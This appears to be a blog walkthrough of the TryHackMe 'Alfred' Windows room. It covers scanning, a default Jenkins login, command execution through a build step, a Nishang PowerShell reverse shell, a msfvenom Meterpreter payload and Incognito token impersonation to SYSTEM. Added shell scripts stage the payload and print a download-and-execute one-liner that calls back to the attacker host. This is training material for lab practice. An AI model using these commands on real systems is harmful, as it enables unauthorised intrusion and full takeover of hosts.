
Introduction
This looks like another Windows machine. Truth be told, I am not sure how comfortable I am with popping Windows boxes. I have used Linux my whole life.
We see Jenkins, and since I am a developer, I have seen Jenkins before. Let me try to explain the concept of Jenkins and CI/CD (Continuous Integration / Continuous Delivery) in a simple way.
1. We have developers who write code on their systems.
2. Once this code is developed, it is tested in different environments (test, prod, etc.).
3. These environments are essentially servers on which this code has to be deployed.
4. A developer commits code to GitHub, which triggers a build in Jenkins; the build gets a unique build number that a deployment tool such as UrbanCode Deploy (UDeploy) can later use to deploy that build to the server.
I am not sure if the target machine is going to use this info. But since I am blogging while solving, I am jotting down everything that is crossing my mind.
The introduction also talks about Nishang, something I have heard of but never used before. Let's start hacking :P
Scanning & Enumeration
Initially, ping or fping suggested that the target IP was down, but Windows hosts commonly block ICMP echo requests (the Windows firewall does so by default), so nmap's host discovery reports them as down.
We need to add -Pn to skip host discovery and treat the host as online.
Nmap Scan
nmap -sV -A -Pn 10.10.111.75
Observations
- Microsoft IIS on port 80,
- nmap reports a disallowed robots.txt entry on port 80,
- port 8080 runs something called Jetty 9.4.z
We do not see any other services. While we analyze this information, we should run a full port scan (-p-) in the background, since the default scan only covers the top 1000 ports and can miss a service (good practice where making a lot of noise is not an issue).
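As an added example (my own, not from the post or TryHackMe), here is that two-pass workflow as a small POSIX shell script: a full 65535-port sweep written in grepable format, then -sV/-sC only against the ports the sweep found open. The sample -oG output at the bottom is constructed to exercise the parser offline; it is not a real scan of the target, and --min-rate 1000 is a tuning choice, not something the post uses.

```shell
#!/bin/sh
# Added example (not from the original post): two-pass nmap workflow.
# Pass 1 sweeps all 65535 TCP ports with -Pn (the target drops ICMP);
# pass 2 runs version/script scans only on the ports pass 1 found open.

# Extract open TCP ports from nmap grepable (-oG) output as a comma list,
# e.g. "80,8080". Reads the file(s) given as arguments, or stdin if none.
# Ports listed under "Ignored State" (closed/filtered) never match.
ports_from_gnmap() {
  grep -o '[0-9][0-9]*/open/tcp' "$@" | cut -d/ -f1 | sort -n | uniq | paste -sd, -
}

# Full sweep, then targeted service enumeration.
# $1 = target host, $2 = output file prefix (default "scan").
full_scan() {
  target=$1
  out=${2:-scan}
  nmap -Pn -p- --min-rate 1000 -oG "$out.gnmap" "$target" >/dev/null
  ports=$(ports_from_gnmap "$out.gnmap")
  if [ -z "$ports" ]; then
    echo "no open TCP ports found on $target" >&2
    return 1
  fi
  echo "open ports: $ports"
  nmap -Pn -sV -sC -p "$ports" -oN "$out.nmap" "$target"
}

# Constructed sample of -oG output (NOT a real scan of the target), used to
# exercise ports_from_gnmap without nmap installed. The 65532 filtered ports
# appear only as a count in "Ignored State" and are correctly left out.
SAMPLE_GNMAP='# Nmap 7.80 scan initiated (constructed sample)
Host: 10.10.111.75 ()   Status: Up
Host: 10.10.111.75 ()   Ports: 80/open/tcp//http///, 135/open/tcp//msrpc///, 8080/open/tcp//http-proxy///   Ignored State: filtered (65532)
# Nmap done'
```

Usage: `full_scan 10.10.111.75 alfred` leaves `alfred.gnmap` (the sweep) and `alfred.nmap` (the service scan) behind. Keeping the sweep separate from the service scan means the slow -sV/-sC probes only touch ports that are actually open, which is why the second pass finishes quickly even after a 65535-port sweep.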
Enumeration
I usually like starting with enumerating the web service.
HTTP Enumeration

Looking at the page source there is no new information, robots.txt doesn’t exist on port 80. Looks like a dead end.
Let us try port 8080.

Now whenever I see a login page, I usually try admin:admin or a few other common passwords.
This time I got the nudge from the question on TryHackMe. The five-letter username and password gave away admin:admin for me.
As soon as we log in, we see the following page

After this, TryHackMe suggests

finding a feature of the tool that allows command execution.
Meanwhile, our full port scan has completed and we find another open port on the machine.
Version Enumeration Table

Vulnerability Scanning
Jetty
We know the service on 8080 is Jetty 9.4.z, the embedded servlet container that Jenkins ships with.

Searchsploit does not reveal any usable exploits for it.
Jenkins
Version — 2.190.1
Even this did not seem to give any meaningful outputs. At this point, I am not sure how to go ahead.
So I thought of creating a new project and looking at what options I have.


Choose a name, select Freestyle project, and click OK.
After clicking OK, we get a number of configuration options. Under the Build section, there is a drop-down menu 'Add build step'.

We see a lot of options. A build step is just a command that Jenkins runs on the build node as the account the Jenkins service runs under, so anyone who can create or edit a job gets command execution on that host. We can try 'Execute shell' / 'Execute Windows batch command', or, as suggested by TryHackMe, use Nishang to get the initial shell.
Exploitation
We use the well-known Nishang scripts for this one!

We need the reverse shell script 'Invoke-PowerShellTcp.ps1' (in Nishang's Shells directory).

Once we have located it, we start an HTTP server on the attacker machine so that the batch build step can download the script from the attacker to the victim.
Attacker IP: 10.4.9.255
Victim IP: 10.10.111.75
4445 is the port of our netcat listener, where we will catch the shell.

Click Save, and once it is saved, build the project! The build output shows that our script was fetched successfully, and we get our first shell!
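To make that build step concrete, here is an added example (my own, not the post's code) of the attacker side: it stages Invoke-PowerShellTcp.ps1 from Kali's nishang package (assumed path /usr/share/nishang/Shells/), serves it over HTTP on port 8000 (an assumed port; the post does not say which it used), prints the exact one-liner to paste into the job's 'Execute Windows batch command' step, and starts the netcat listener. The -Reverse, -IPAddress and -Port parameters are Invoke-PowerShellTcp's real ones; the IPs and listener port follow the post.

```shell
#!/bin/sh
# Added example (not from the original post): attacker-side staging for the
# Nishang reverse shell. Assumes Kali's nishang package under
# /usr/share/nishang, python3 and netcat on the attacker box.
# Assumed HTTP port: 8000. Listener port 4445 and IP 10.4.9.255 are the post's.

# Print the one-liner for the Jenkins "Execute Windows batch command" step.
# $1 = attacker IP, $2 = HTTP port serving the .ps1, $3 = reverse-shell port.
# IEX of the downloaded text defines Invoke-PowerShellTcp in memory (nothing
# is written to disk on the target), then the function is called to connect
# back to our listener.
build_step_cmd() {
  printf "powershell -NoProfile -ExecutionPolicy Bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress %s -Port %s\"\n" "$1" "$2" "$1" "$3"
}

# Copy the script into a web root, serve it in the background, print the
# build step to paste into Jenkins, and wait for the shell in the foreground.
# $1 = attacker IP, $2 = HTTP port (default 8000), $3 = shell port (default 4445).
attacker_setup() {
  ip=$1
  http_port=${2:-8000}
  shell_port=${3:-4445}
  mkdir -p www
  cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 www/   # assumed Kali path
  (cd www && python3 -m http.server "$http_port") &
  echo "Paste this into the 'Execute Windows batch command' build step:"
  build_step_cmd "$ip" "$http_port" "$shell_port"
  nc -lvnp "$shell_port"
}
```

Usage: `attacker_setup 10.4.9.255 8000 4445`, then paste the printed line into the job and click Build Now. The shell that lands runs as whatever account the Jenkins service runs under, which is why a privesc step follows. Note that the full command line is stored in the job's config.xml and echoed in the build's console output, so it is plainly visible to anyone reviewing Jenkins afterwards.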

Got the user flag as well, it’s time to privesc!
Privesc
At this point TryHackMe wants us to switch shells, suggesting that switching to meterpreter will make Privesc easy for us.
Use msfvenom to create a Windows Meterpreter reverse shell (32-bit, x86/shikata_ga_nai encoded) with the following command:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
Once the payload is generated, start an HTTP server to serve it to the target machine. Do not forget to start a listener with 'multi/handler' in Metasploit, with the same payload, LHOST and LPORT as the msfvenom command. Then download the payload on the target machine and run it.

And we have our meterpreter up and running :P

Now we start talking about privesc. Reading a little on TryHackMe gives us the following new information:
1. Windows uses access tokens to ensure that accounts have the right privileges.
2. LSASS.exe takes care of this authentication and of creating the tokens.
More information can be found here.
We list the privileges of our current token with getprivs. The one that matters for the next step is SeImpersonatePrivilege, which lets a process impersonate other users' tokens.

We now load the Incognito extension with load incognito, and list the tokens available to us with list_tokens -u.


NT AUTHORITY\SYSTEM is the equivalent of root on a Windows machine. Impersonating it only gives our current thread an impersonation token, so to get a stable SYSTEM context we migrate into a process that already runs as SYSTEM; services.exe is usually a good choice.

We migrate to services.exe using migrate 668 (668 being its PID from ps on this machine)
and we get the root flag.
Parting Thoughts
In this blog post, I have not tried to finish the room without using Metasploit. The main reasons for that are:
1. I have no idea as of today, how to do it.
2. Being a newbie to Windows machines takes a toll on confidence
Hence I am just jotting this down in my notes and trying to understand how we were able to PrivEsc.
Thanks for reading, and your valuable feedback is more than appreciated :)